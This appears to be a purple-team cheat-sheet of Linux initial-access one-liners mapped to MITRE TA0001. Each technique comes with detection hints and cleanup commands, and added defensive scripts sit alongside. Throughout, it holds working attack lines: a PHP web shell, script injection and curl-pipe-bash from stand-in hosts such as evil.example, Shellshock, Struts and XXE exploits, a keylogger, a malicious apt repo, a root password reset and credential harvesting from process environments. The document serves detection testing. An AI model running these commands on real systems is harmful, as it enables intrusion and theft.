Linux Initial Access Commands Cheat-Sheet – TA0001
Updated on 13 June 2025
Purple teaming lives or dies on coverage. The more distinct ways you can trigger an Initial-Access alert, the faster you uncover gaps in SIEM, EDR and anti-virus coverage. Every section below gives you:
- Why it matters – threat context in one sentence.
- One-liners, lots of them – each line is a stand-alone bash command. If one action depends on another, it is chained with && so you still get a single copy/paste line.
- Blue-team watch-outs – artefacts defenders should see.
- Cleanup tip – a single command to reset the host so you can rerun the test.
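The run, watch, clean up, rerun loop the list describes, as an added harness (example code, not part of the original cheat-sheet). It executes one ability string, checks for the artefact defenders should see, runs the cleanup string and confirms the host is back to baseline. The sample ability, the `/tmp/shellshock_pwned` artefact path and the function names are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original cheat-sheet): a minimal purple-team
# harness around one "one-liner + cleanup" pair from this page.

# run_ability NAME COMMAND CLEANUP ARTEFACT
#   COMMAND  - the one-liner from the sheet
#   CLEANUP  - its cleanup string
#   ARTEFACT - a path that must exist after COMMAND and be gone after CLEANUP
# Prints "NAME start=<ts> executed=<0|1> artefact=<0|1> cleaned=<0|1>" and
# returns 0 only when all three checks pass, so a broken cleanup is caught
# before the next rerun.
run_ability() {
    name=$1; cmd=$2; cleanup=$3; artefact=$4
    executed=0; seen=0; cleaned=0
    start=$(date '+%Y-%m-%dT%H:%M:%S')          # timestamp to correlate in the SIEM
    if sh -c "$cmd" >/dev/null 2>&1; then executed=1; fi
    [ -e "$artefact" ] && seen=1                 # what FIM/EDR should have caught
    sh -c "$cleanup" >/dev/null 2>&1 || true     # always attempt the reset
    [ -e "$artefact" ] || cleaned=1
    printf '%s start=%s executed=%d artefact=%d cleaned=%d\n' \
        "$name" "$start" "$executed" "$seen" "$cleaned"
    [ "$executed" -eq 1 ] && [ "$seen" -eq 1 ] && [ "$cleaned" -eq 1 ]
}

# Assumed sample ability: the Shellshock proof in T1190 leaves
# /tmp/shellshock_pwned behind. The artefact is created directly here so the
# harness can be exercised on a box with no vulnerable CGI.
demo() {
    run_ability "T1190-shellshock-artefact" \
        "touch /tmp/shellshock_pwned" \
        "rm -f /tmp/shellshock_pwned" \
        "/tmp/shellshock_pwned"
}
```

Wire the real one-liner into the second argument and the section's cleanup string into the third; the printed line is the record you hand to the blue team to look up in the SIEM.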
For deeper MITRE background, read MITRE ATT&CK TA0001 and explore CALDERA's documentation. Looking for other cheat sheets? Linux Privilege Escalation Commands and
T1659 – Content Injection
Why it matters — attackers plant malicious markup or code in otherwise legitimate pages/services.
# Inject rogue <script> into Apache index
sudo sed -i '1i <script src="http://evil.example/payload.js"></script>' /var/www/html/index.html
# SQLi auth-bypass (tautology) against login form
curl -X POST "http://target-server/login.php" -d "username=admin' OR '1'='1' -- &password=foo"
# XSS probe via search parameter (reflected; stored if the app persists queries)
curl -G "http://target-server/search.php" --data-urlencode "q=<script>alert(1)</script>"
# Command-injection ping test
curl -s "http://target-server/ping.php?host=127.0.0.1;whoami"
# Inline PHP web-shell (call it as /info.php?cmd=id)
printf '<?php system($_GET["cmd"]); ?>' | sudo tee /var/www/html/info.php
Watch for WAF hits, FIM hash changes, www-data spawning shells.
Cleanup (assumes the webroot is git-tracked; otherwise restore index.html from backup) sudo git -C /var/www/html checkout -- . && sudo rm -f /var/www/html/info.php
T1189 – Drive-by Compromise
Why it matters — one browser visit, one payload.
# Host a tiny exploit kit
python3 -m http.server 8080 --directory /tmp/exploit_kit --bind 0.0.0.0
# curl | bash installer
curl -fsSL http://malicious.example/installer | bash -s -- --silent
# Drop-and-run shell script
curl -s http://malicious.example/drop.sh -o /tmp/drop.sh && chmod +x /tmp/drop.sh && /tmp/drop.sh
# Grab watering-hole page for offline triage
wget -O /tmp/malicious.html http://compromised-site.com/index.html
# Force a live browser hit
xdg-open http://malicious.example || true
Watch for new /tmp binaries, outbound DNS/HTTP to fresh domains, SentinelOne exploit heuristics.
Cleanup pkill -f 'http.server 8080'; rm -f /tmp/drop.sh /tmp/malicious.*
T1190 – Exploit Public-Facing Application
Why it matters — one unpatched CVE can hand over a shell.
# Shellshock RCE proof
curl -H 'User-Agent: () { :;}; /bin/bash -c "touch /tmp/shellshock_pwned"' http://127.0.0.1/cgi-bin/status || true
# Apache Struts OGNL RCE (whoami)
curl -X POST "http://target-server/struts2-showcase/" -H "Content-Type: application/x-www-form-urlencoded" \
  -d "name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='whoami').(#p=new java.lang.ProcessBuilder({'bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#p.start())}"
# XXE to read /etc/passwd
curl -H 'Content-Type: application/xml' -d '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>' "http://127.0.0.1/upload?debug=true"
# Path-traversal via netcat
printf 'GET /../../../../etc/shadow HTTP/1.0\r\n\r\n' | nc 127.0.0.1 8080
# sqlmap dump (no interaction)
sqlmap -u "http://target-server/vuln.php?id=1" --batch --dbs
Watch for IDS exploit signatures, error spikes, web-server child shells.
Cleanup killall sqlmap; rm -f /tmp/shellshock_pwned
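The "web-server child shells" artefact every command in this section produces, as an added detection (example code, not part of the original sheet). It reads `ps -eo user,ppid,pid,comm --no-headers` output and flags shell-like processes owned by a web account or parented by a web server process; the user, process and shell name lists and the sample process tree are constructed assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheat-sheet: spot shells spawned under a
# web server from a ps snapshot. Usage on a live host:
#   ps -eo user,ppid,pid,comm --no-headers | flag_web_children

WEB_USERS='www-data apache nginx http'                 # assumed web service accounts
WEB_COMMS='apache2 httpd nginx php-fpm php-fpm7.4 php-fpm8.2 php-cgi'
SHELLS='sh bash dash zsh nc ncat python3 perl'          # "shell-like" for this check

# flag_web_children < ps-output
# Emits "USER PID COMM parent=PPID/PARENT_COMM" for every shell-like process
# whose owner is a web account or whose parent is a web server process.
flag_web_children() {
    awk -v webusers="$WEB_USERS" -v webcomms="$WEB_COMMS" -v shells="$SHELLS" '
    BEGIN {
        n = split(webusers, a, " "); for (i = 1; i <= n; i++) wu[a[i]] = 1
        n = split(webcomms, a, " "); for (i = 1; i <= n; i++) wc[a[i]] = 1
        n = split(shells,   a, " "); for (i = 1; i <= n; i++) sh[a[i]] = 1
    }
    # first pass: index every process by pid so parents can be resolved
    NF >= 4 { user[$3] = $1; ppid[$3] = $2; comm[$3] = $4; order[++cnt] = $3 }
    END {
        for (i = 1; i <= cnt; i++) {
            pid = order[i]
            if (!(comm[pid] in sh)) continue
            pc = comm[ppid[pid]]
            if ((user[pid] in wu) || (pc in wc))
                printf "%s %s %s parent=%s/%s\n", user[pid], pid, comm[pid], ppid[pid], pc
        }
    }'
}

# Constructed sample (not a real capture): an Apache worker tree with one child
# shell chain, plus an admin's interactive bash that must not be flagged.
SAMPLE_PS='root      1    1 systemd
root      1  800 apache2
www-data  800  801 apache2
www-data  800  802 apache2
www-data  802  950 sh
www-data  950  951 bash
alice     1  700 bash
root      1  900 nginx
nginx     900  901 nginx'

demo_flags() { printf '%s\n' "$SAMPLE_PS" | flag_web_children; }
```

Both the `sh` spawned by the worker and the `bash` it exec'd are reported, because the second is caught by its owner even though its parent is no longer a web server process; run it from cron or an EDR custom rule and alert on any output.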
T1133 – External Remote Services
Why it matters — stolen creds + SSH/VPN/RDP = stealthy foothold.
# Key-based SSH
ssh -o StrictHostKeyChecking=no attacker@10.0.0.2 'hostname && id'
# sshpass password auth
sshpass -p 'P@ssw0rd!' ssh attacker@10.0.0.2 'echo $(date) >> ~/.owned'
# File exfil via SFTP
sftp -oBatchMode=yes attacker@10.0.0.2:/etc/issue /tmp/issue_copy
# OpenVPN tunnel
openvpn --config stolen.ovpn --daemon
# openconnect to Cisco AnyConnect
echo 'vpnpass' | openconnect --user attacker vpn.target.com --passwd-on-stdin --background
Watch for new tun adapters, geo-impossible logins, outbound 22/1194 flows.
Cleanup pkill openvpn; pkill openconnect; rm -f /tmp/issue_copy; ssh attacker@10.0.0.2 'rm -f ~/.owned'
T1200 – Hardware Additions
Why it matters — a rogue USB or NIC bypasses software controls.
# Hot-plug virtual USB (needs a usbipd exporter reachable at 127.0.0.1; vhci-hcd is the client-side driver)
sudo modprobe vhci-hcd && sudo usbip attach -r 127.0.0.1 -b 1-1
# Dummy NIC in rogue subnet
sudo ip link add rogue0 type dummy && sudo ip addr add 192.168.100.1/24 dev rogue0 && sudo ip link set rogue0 up
# Slow real NIC (perf anomaly)
sudo ethtool -s eth0 speed 10 duplex half
# HID key-logger capture (event0 is assumed to be the keyboard; check /proc/bus/input/devices)
sudo cat /dev/input/event0 | hexdump -C > /tmp/keylog.txt &
# Spoof USB product string (the sysfs attribute is read-only, so the write fails; the attempt itself is the artefact to log)
echo "BadUSB" | sudo tee /sys/bus/usb/devices/1-1/product
Watch for new VID/PID, interface speed change, Tanium hardware delta.
Cleanup sudo ip link del rogue0; sudo pkill -f /dev/input/event0; rm -f /tmp/keylog.txt; sudo ethtool -s eth0 autoneg on; sudo usbip detach -p 1
T1566 – Phishing & Sub-Techniques
T1566.001 – Spearphishing Attachment
# Build & mail bash attachment
echo -e '#!/bin/bash\necho phished > /tmp/pwn' > /tmp/p.sh && chmod +x /tmp/p.sh && \
mutt -s "Invoice" -a /tmp/p.sh -- user@target <<< "Please review"
T1566.002 – Spearphishing Link
# One-click malicious link email
printf 'Subject: Action Required\n\nClick http://phish.example/login\n' | sendmail user@target
T1566.003 – Spearphishing via Service
# Telegram drop-link (<id> and <token> are placeholders; keep the URL quoted or the shell treats < > as redirections)
curl -X POST -d "chat_id=<id>&text=Gift+http://bad.example" "https://api.telegram.org/bot<token>/sendMessage"
T1566.004 – Phishing Voice (Vishing)
# Simulated vishing call log
logger "T1566.004 simulated vishing call asking for VPN creds"
Watch for mail-gateway detonation, proxy hits, abnormal Telegram/DNS, a syslog line mentioning vishing.
Cleanup (Postfix) sudo postsuper -d ALL; rm -f /tmp/p.sh /tmp/pwn
T1091 – Replication Through Removable Media
Why it matters — autorun USBs still work when EDR is offline.
# Build autorun USB structure
mkdir -p /tmp/usb && \
echo -e '#!/bin/bash\necho autorun > /tmp/usb_exec.log' > /tmp/usb/autorun.sh && chmod +x /tmp/usb/autorun.sh && \
echo -e '[Autorun]\nopen=autorun.sh' > /tmp/usb/autorun.inf && cp /bin/sh /tmp/usb/malware.exe
# Live udev monitor
udevadm monitor --udev --property | grep -E '(ID_BUS=usb|DEVTYPE=disk)' &
Watch for execution from removable paths, new mount-points, SentinelOne removable-media alerts.
Cleanup rm -rf /tmp/usb /tmp/usb_exec.log; pkill udevadm
T1195 – Supply-Chain Compromise & Sub-Techniques
T1195.001 – Compromise Software Dependencies / Dev Tools
# Malicious APT repo + update
echo "deb http://bad.repo/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/bad.list && sudo apt update
# Dependency confusion via rogue PyPI
pip install --index-url http://bad.pypi/simple/ requests
T1195.002 – Compromise Software Supply Chain
# Unsigned RPM install
sudo rpm -Uvh --nosignature tampered-1.0-1.x86_64.rpm
# Overwrite system .so (back it up first: a bad libssl breaks every TLS client on the box until it is restored)
sudo cp -a /usr/lib/libssl.so.1.1 /tmp/libssl.so.1.1.bak && sudo wget -O /usr/lib/libssl.so.1.1 http://malicious.com/libssl.so.bad
T1195.003 – Compromise Hardware Supply Chain
# Fake firmware drop
logger "T1195.003 simulated firmware backdoor uploaded"
echo "$(date) fake-firmware-hash" | sudo tee -a /var/log/firmware_audit.log
Watch for unsigned packages, new repo URLs, firmware audit anomalies.
Cleanup sudo rm /etc/apt/sources.list.d/bad.list && sudo apt update; sudo rpm -e tampered; sudo mv /tmp/libssl.so.1.1.bak /usr/lib/libssl.so.1.1
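The "FIM hash changes" artefact named under T1659 and the overwritten system .so under T1195.002 are the same detection, so one added example serves both (example code, not part of the original sheet): a baseline/diff over a directory tree using sha256sum. The self-check replays the T1659 pattern on a scratch webroot; directory paths and function names are assumptions, and paths containing spaces are not handled.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheat-sheet: minimal file-integrity
# baseline and diff. Linux coreutils (sha256sum, GNU sed) are assumed.

# fim_baseline DIR OUTFILE - record "sha256  path" for every regular file
fim_baseline() {
    find "$1" -type f -exec sha256sum {} + 2>/dev/null | LC_ALL=C sort -k2 > "$2"
}

# fim_diff BASELINE DIR - print "ADDED|MODIFIED|REMOVED path", sorted
fim_diff() {
    base=$1; dir=$2; cur=$(mktemp)
    fim_baseline "$dir" "$cur"
    # keyed on FILENAME rather than NR==FNR so an empty baseline cannot
    # silently swallow the current snapshot
    awk -v base="$base" '
        FILENAME == base { b[$2] = $1; next }
        {
            if (!($2 in b)) print "ADDED " $2
            else { if (b[$2] != $1) print "MODIFIED " $2; delete b[$2] }
        }
        END { for (p in b) print "REMOVED " p }' "$base" "$cur" | sort
    rm -f "$cur"
}

# Self-check on a scratch webroot (constructed): baseline, then inject into the
# index like the T1659 sed one-liner, drop a web-shell and delete a file.
demo_fim() {
    root=$(mktemp -d); base=$(mktemp)
    printf '<html>hi</html>\n' > "$root/index.html"
    printf 'User-agent: *\n' > "$root/robots.txt"
    fim_baseline "$root" "$base"
    sed -i '1i <script src="http://evil.example/payload.js"></script>' "$root/index.html"
    printf '<?php system($_GET["cmd"]); ?>\n' > "$root/info.php"
    rm -f "$root/robots.txt"
    fim_diff "$base" "$root" | sed "s|$root/||"      # strip the scratch prefix
    rm -rf "$root" "$base"
}
```

For the T1195.002 case, baseline `/usr/lib` (or the distro's `/usr/lib/x86_64-linux-gnu`) before the wget and the overwritten `libssl.so.1.1` shows up as MODIFIED; keep the baseline file off-host, since an attacker who can overwrite libraries can also rewrite a local baseline.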
T1199 – Trusted Relationship
Why it matters — if the MSP is owned, so are you.
# Resolve partner LDAP SRV
dig +short _ldap._tcp.partner.com SRV
# Use MSP SSH key
ssh -i /tmp/msp_key.pem service@partner.com 'whoami && hostname'
# Sweep partner space
nmap -sn 10.0.0.0/8 | grep -E '(partner|vendor|supplier)'
Watch for cross-tenant auth, new SSH fingerprints, SIEM alert on partner IPs.
Cleanup killall nmap
T1078 – Valid Accounts & Sub-Techniques
T1078.001 – Default Accounts
# Reset root to weak password (save the current hash first so cleanup can restore it)
sudo sh -c "grep '^root:' /etc/shadow | cut -d: -f1,2 > /root/root.shadow.bak" && echo 'root:P@ssw0rd!' | sudo chpasswd
# Abuse default admin:admin over HTTP
curl -u admin:admin http://target-server.com/admin/
# Credential-stuffing via Hydra
hydra -L /tmp/usernames.txt -P /tmp/passwords.txt ssh://target-server.com
T1078.002 – Domain Accounts
# Kerberos TGT with stolen creds
kinit compromised@REALM && klist
T1078.003 – Local Accounts
# Create local user with sudo
sudo useradd -m attacker && echo 'attacker:P@ss' | sudo chpasswd && sudo usermod -aG sudo attacker
# Snatch secrets from process environment (root needed to read other users' environ)
sudo strings /proc/*/environ 2>/dev/null | grep -iE 'pass|token|cred' | head
T1078.004 – Cloud Accounts
# AWS key abuse
aws sts get-caller-identity --profile breached
Watch for bursts of failed logins, new /etc/passwd entries, unexpected cloud API calls.
Cleanup sudo sh -c 'chpasswd -e < /root/root.shadow.bak'; sudo userdel -r attacker; kdestroy
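The "bursts of failed logins" artefact that the Hydra and sshpass one-liners generate, as an added detection (example code, not part of the original sheet): a per-source, per-minute bucket counter over syslog-style sshd lines in auth.log. The threshold, the hostname and every log line in the sample are constructed assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheat-sheet: flag sources with >= N
# "Failed password" events inside one clock minute. Usage on a live host:
#   failed_login_bursts 5 < /var/log/auth.log

# failed_login_bursts THRESHOLD < auth.log
# Prints "IP MINUTE COUNT" for each (source, minute) bucket at or over THRESHOLD.
failed_login_bursts() {
    awk -v thr="${1:-5}" '
    /sshd\[[0-9]+\]: Failed password for/ {
        # $1 $2 $3 = "Jun 13 10:00:01"; drop the seconds for a one-minute bucket
        minute = $1 " " $2 " " substr($3, 1, 5)
        ip = ""
        for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
        if (ip != "") n[ip "\t" minute]++
    }
    END {
        for (k in n) if (n[k] >= thr) {
            split(k, p, "\t")
            printf "%s %s %d\n", p[1], p[2], n[k]
        }
    }' | sort
}

# Constructed sample (not a real capture): one source hammering sshd with a
# wordlist, and one user who mistyped a password once.
SAMPLE_AUTH='Jun 13 10:00:01 web01 sshd[4101]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
Jun 13 10:00:02 web01 sshd[4102]: Failed password for invalid user test from 203.0.113.7 port 51001 ssh2
Jun 13 10:00:02 web01 sshd[4103]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun 13 10:00:03 web01 sshd[4104]: Failed password for invalid user oracle from 203.0.113.7 port 51003 ssh2
Jun 13 10:00:04 web01 sshd[4105]: Failed password for invalid user git from 203.0.113.7 port 51004 ssh2
Jun 13 10:00:05 web01 sshd[4106]: Failed password for ubuntu from 203.0.113.7 port 51005 ssh2
Jun 13 10:00:09 web01 sshd[4110]: Accepted publickey for alice from 198.51.100.5 port 40022 ssh2
Jun 13 10:01:30 web01 sshd[4120]: Failed password for alice from 198.51.100.5 port 40030 ssh2
Jun 13 10:01:41 web01 sshd[4121]: Accepted password for alice from 198.51.100.5 port 40031 ssh2'

demo_bursts() { printf '%s\n' "$SAMPLE_AUTH" | failed_login_bursts 5; }
```

Minute buckets miss a burst that straddles a minute boundary; if that matters, lower the threshold or run a second pass over the same data shifted by 30 seconds. The same loop, keyed on the target username instead of the source IP, catches password spraying from many sources.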
T1669 – Wi-Fi Networks
Exploits insecure or rogue wireless networks to gain entry or harvest credentials.
# Rogue AP
hostapd -B rogue.conf && dhcpd -cf dhcpd.conf wlan0
# Capture WPA handshake
airodump-ng -c 6 --bssid {{target_bssid}} -w cap wlan0
aircrack-ng cap-01.cap -w rockyou.txt
# Evil-twin captive portal
wifiphisher --essid "{{corp_wifi}}" --logging -p oauth-login
# Connect to open guest SSID
nmcli d wifi connect {{open_ssid}}
Watch for unknown BSSIDs advertising corporate ESSIDs, deauthentication bursts, managed hosts joining unmanaged SSIDs.
Caldera integration tips 🛠️
- One line = one ability – paste the command directly into executor: sh.
- Add cleanup – glue the cleanup string under the ability's cleanup field.
- Randomise & delay – use timers or facts so operations feel human.
- Tag each ability – include the ATT&CK ID/sub-ID so reporting maps cleanly.
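The four tips above combined into one step, as an added helper (example code, not part of the original sheet or of the CALDERA project): it takes an ATT&CK ID, a technique name, one cheat-sheet line and its cleanup string, and writes a CALDERA ability YAML with the tactic, technique and `platforms.linux.sh.command/cleanup` fields laid out as in CALDERA's stock abilities. The ability id is generated here, the output directory is an assumption, and ability names containing `: ` are not escaped.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheat-sheet: emit a CALDERA ability file
# from a one-liner and its cleanup string. Values are written with printf, not
# a heredoc, so $(...) and % inside the command are never expanded or formatted.

# make_ability ATTACK_ID TECHNIQUE_NAME ABILITY_NAME COMMAND CLEANUP [OUTDIR]
# Writes OUTDIR/<uuid>.yml and prints its path.
make_ability() {
    attack_id=$1; tech=$2; name=$3; cmd=$4; cleanup=$5
    outdir=${6:-./abilities/initial-access}            # assumed location
    # uuidgen where available, otherwise 16 random bytes in the same 8-4-4-4-12 shape
    if command -v uuidgen >/dev/null 2>&1; then
        id=$(uuidgen | tr 'A-Z' 'a-z')
    else
        id=$(od -An -N16 -tx1 /dev/urandom | tr -d ' \n' |
             sed 's/^\(.\{8\}\)\(.\{4\}\)\(.\{4\}\)\(.\{4\}\)\(.\{12\}\)$/\1-\2-\3-\4-\5/')
    fi
    mkdir -p "$outdir"
    file="$outdir/$id.yml"
    {
        printf -- '- id: %s\n' "$id"
        printf '  name: %s\n' "$name"
        printf '  description: Purple-team check for %s (%s)\n' "$attack_id" "$tech"
        printf '  tactic: initial-access\n'
        printf '  technique:\n    attack_id: %s\n    name: %s\n' "$attack_id" "$tech"
        printf '  platforms:\n    linux:\n      sh:\n'
        printf '        command: |\n          %s\n' "$cmd"
        printf '        cleanup: |\n          %s\n' "$cleanup"
    } > "$file"
    printf '%s\n' "$file"
}

# Sample run using the Shellshock line and cleanup from the T1190 section,
# written to a scratch directory.
demo_ability() {
    make_ability T1190 "Exploit Public-Facing Application" "Shellshock proof" \
        "curl -H 'User-Agent: () { :;}; /bin/bash -c \"touch /tmp/shellshock_pwned\"' http://127.0.0.1/cgi-bin/status || true" \
        "rm -f /tmp/shellshock_pwned" "$(mktemp -d)"
}
```

Drop the resulting file into a plugin's `data/abilities/initial-access/` directory and CALDERA picks it up on restart; because the ATT&CK ID is carried in `technique.attack_id`, operation reports map straight back to the TA0001 rows of this sheet.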
Conclusion 🎯
With every TA0001 technique and sub-technique represented (several dozen self-contained commands plus their cleanups), you can now hammer your environment from every Initial-Access angle, measure detections, tune, and rerun until nothing slips through. Next, learn how to fine-tune an LLM to find vulnerabilities and keep the edge.